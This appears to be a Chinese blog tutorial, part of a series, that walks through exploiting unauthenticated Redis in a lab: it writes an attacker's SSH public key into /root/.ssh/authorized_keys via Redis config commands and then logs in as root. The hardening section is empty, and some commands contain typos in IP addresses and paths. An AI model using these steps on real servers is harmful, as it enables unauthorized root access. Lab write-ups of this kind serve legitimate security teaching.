前言
系列文章
Redis未授权访问漏洞(一)先导篇
Redis未授权访问漏洞(二)Webshell提权篇
Redis未授权访问漏洞(三)Redis写入反弹连接定时任务

SSH key免密登录



实战实验
环境准备
实验前我们先来复习一遍ssh-key免密登录的流程

攻击机: Centos7 IP:192.168.142.44
靶机:Centos7 IP:192.168.142.66

步骤一:在攻击机生成SSH key

ssh-keygen

然后只需要点击回车键就好,不需要输入密码:

现在已经生成好了

注意:生成的目录是.ssh,是一个隐藏的目录

ls -a

查看当前目录下的文件:
进入这个目录

cd .ssh

ls

查看当前目录文件:
可以看到这里.ssh目录下有两个文件:

id_rsa是私钥,id_rsa.pub是公钥

然后我们需要把公钥发送给靶机:

ssh-copy-id root@192.168.142.66


这里让我们输入靶机root用户的密码

现在到我们的靶机上查看有没有ssh-key文件:

我们的靶机上出现了刚刚我们从客户端传来的文件

我们回到攻击机上查看id_rsa.pub的内容:


再回到靶机上查看authorized_keys的内容:
发现两个文件的内容居然是一样的,那么现在我们是不是可以实现ssh-key免密登录了?

ssh -i ./id_rsa root@1921.68.142.66



可以看到我们已经成功用ssh-key免密登陆了192.168.142.66的机器

好了,ssh-key免密登录的流程已经复习完毕了,正式进入我们的实战试验吧

步骤一:我们通过攻击机启动Redis客户端去远程连接靶机的6379端口,模仿黑客通过公网的6379端口入侵企业的Web服务器

redis-cli -h 192.169.142.66 -p 6379

步骤二:再打开攻击机的终端,找到.ssh文件,将id_rsa.pub中的文件内容复制下来:

步骤三:构造一下语句,写入

set xxx "\n\n-------\n\n\n"

中间的--------放刚刚复制的公钥的内容:

然后修改文件的存储路劲:

config set dir /root/.ssh

接着修改文件的存储文件名:

config set dbfilename authorized_keys

save保存:

save

然后回到我们攻击机的.ssh目录下,注意这一步必须在.ssh目录下执行,不然会找不到文件的

cd /.ssh
ls


然后我们通过密钥去连接:

ssh -i ./id_rsa root@192.168.142.66

登录靶机成功:


Redis加固方案

Redis未授权访问漏洞(四)SSH key免密登录相关推荐

  1. Redis未授权访问漏洞记录(端口:6379)

    目录 Redis 扫描 未授权登录以及利用 写入SSH公钥,进行远程登录 定时任务反弹shell 写入一句话木马 其它一句话木马 ​ 写入/etc/passwd文件 利用主从复制RCE ​ 本地Red ...

  2. Redis未授权访问漏洞详细版

    Redis未授权访问漏洞 Redis未授权访问漏洞原理 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样 ...

  3. 未授权访问漏洞-Redis未授权访问漏洞

    文章目录 未授权概述 常见未授权访问漏洞 Redis未授权访问 Redis简介 应用场景 Redis 架构 漏洞发现 端口 端口探测 Redis常用命令 Redis历史漏洞 Redis未授权访问 Re ...

  4. 漏洞检测与防御:Redis未授权访问漏洞复现

    漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...

  5. Redis未授权访问漏洞的重现与利用

    前言: 最近配置openvas的时候安装了redis,听说曾经曝出过一个未授权访问漏洞,便找了一下相关资料想自己动手复现一下漏洞的利用过程,当然所有的攻击性操作都是在虚拟机上完成的,本文所有的操作是在 ...

  6. Redis未授权访问漏洞的利用及防护

    什么是Redis未授权访问漏洞? Redis在默认情况下,会绑定在0.0.0.0:6379.如果没有采取相关的安全策略,比如添加防火墙规则.避免其他非信任来源IP访问等,这样会使Redis服务完全暴露 ...

  7. redis未授权访问漏洞环境搭建复现-ssh免密登录

    首先,安装redis 我是直接sudo apt-get redis 安装的 然后启动redis 直接找到/usr/bin目录下的redis-server和redis-cli 测试连接成功 因为我是腾讯 ...

  8. 哪种修复redis未授权访问漏洞的方法是相对不安全的_关于Linux挖矿、DDOS等应急事件处置方法...

    前言 从去年六月份到现在做的应急响应.事件分析大大小小的做了数百个,主要遇到的有挖矿.DDoS.短信接口盗刷.用户接口泄漏.越权信息获取.挂黑页.删数据等.本文只针对自己做的应急响应中的挖矿和DDoS ...

  9. Redis未授权访问漏洞复现

    Redis介绍 redis是一个key-value存储系统.和Memcached类似,它支持存储的value类型相对更多,包括string(字符串).list(链表).set(集合).zset(sor ...

最新文章

  1. python写元旦快乐_用Python在00:00给微信好友发元旦祝福语
  2. JQ 为未来元素添加事件处理器—事件委托
  3. 【IT资讯】TIOBE - 2020年6月编程语言排行
  4. python从数分到数编(part2)--随机数及数组
  5. HDU 1213 How Many Tables(并查集模板)
  6. python变量和对象,切片列表元祖
  7. Oracle HA 之 OGG部署流水
  8. PLSQL导出表结构
  9. 关于origin2019的安装教程
  10. 直播app开发中视频编码标准发展史
  11. workbench应力应变曲线_ANSYS WORKBENCH后处理中各种应力结果的详细说明
  12. flash activex java_Adobe flash player ActiveX和NPAPI和PPAPI 这三个软件有什么区别?哪个是不必要的?...
  13. 地图-导航(百度/高德)
  14. Java将英文句子分解为单词
  15. npm 安装中的 i、-g、--save、--save-dev、-D、-S的区别
  16. Hammer.js 进行图片缩放
  17. Excel-制作各国历年GDP动态图
  18. 1.数组简介:什么是数组???数组有哪四要素???
  19. jsp的两种开发模式
  20. 电商网站商品模型之商品详情页设计方案 - 梦亦晓 - 博客园

热门文章

  1. Ubuntu篇——Ubuntu虚拟机网络设置
  2. 【水浒传】——鲁智深
  3. 2基础知识——路由和数据包转发介绍
  4. 可怕的社会工程学黑客渗透技术,比骗术更高明的艺术
  5. Module not found: Error: Can‘t resolve ‘./components/Login.vue‘ in 项目路径问题
  6. python中finally的用法_python中的finally用法
  7. jQuery $(this) 无法获取 value解决方法
  8. 关于社会性软件、IM和p2p等的随想
  9. 佛大计算机控制系统期末试卷,计算机控制系统作业-冯诺依曼结构和哈佛结构...
  10. 华为mate40pro和小米10pro哪个好-华为mate40pro和小米10pro对比-华为mate40pro和小米10pro像素 那个好